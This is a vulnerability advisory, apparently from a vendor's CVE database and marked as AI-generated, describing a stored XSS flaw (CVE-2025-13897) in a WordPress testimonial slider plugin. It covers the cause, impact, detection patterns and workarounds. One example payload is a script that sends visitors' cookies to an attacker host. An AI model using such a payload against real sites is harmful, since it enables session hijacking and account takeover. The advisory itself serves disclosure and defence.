
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13897 is a Stored Cross-Site Scripting (XSS) vulnerability in the Client Testimonial Slider plugin for WordPress, affecting all versions up to and including 2.0. The flaw exists in the aft_testimonial_meta_name custom field within the Client Information metabox, where insufficient input sanitization and output escaping allow authenticated attackers with Contributor-level access or above to inject arbitrary web scripts. The vulnerability was disclosed on January 9, 2026, and was reported by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code is located at line 117 of wp-client-testimonial.php, where user-supplied input from the aft_testimonial_meta_name field in the Client Information metabox is stored without proper sanitization and later rendered without output escaping. An attacker with at least Contributor-level WordPress access can submit a malicious payload through this field, which is then persistently stored and executed in the browser of any user who visits the affected administrative page (Wordfence, Plugin Source).
Successful exploitation allows an authenticated attacker to persistently inject and execute arbitrary JavaScript in the context of administrative pages, affecting any user — including administrators — who accesses those pages. This can lead to session hijacking, credential theft, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and potential full site compromise. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the plugin itself to the broader WordPress environment (Wordfence).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13897. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
aft_testimonial_meta_name field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.wp_postmeta table for the aft_testimonial_meta_name meta key containing <script>, javascript:, onerror=, or other HTML event handler patterns.As of the disclosure date (January 9, 2026), no patched version of the Client Testimonial Slider plugin beyond version 2.0 was confirmed available. Site administrators should immediately deactivate and remove the plugin until a patched version is released. As a workaround, restrict Contributor-level user registrations and audit existing contributor accounts for suspicious activity. Monitor the official WordPress plugin repository for an updated version that implements proper input sanitization (e.g., sanitize_text_field()) and output escaping (e.g., esc_html() or esc_attr()) on the affected field (Wordfence, Plugin Source).
Wordfence disclosed and reported this vulnerability as part of their weekly WordPress vulnerability report for January 5–11, 2026, covering it alongside numerous other WordPress plugin issues (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified for this specific CVE, consistent with its medium severity and limited attack surface.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."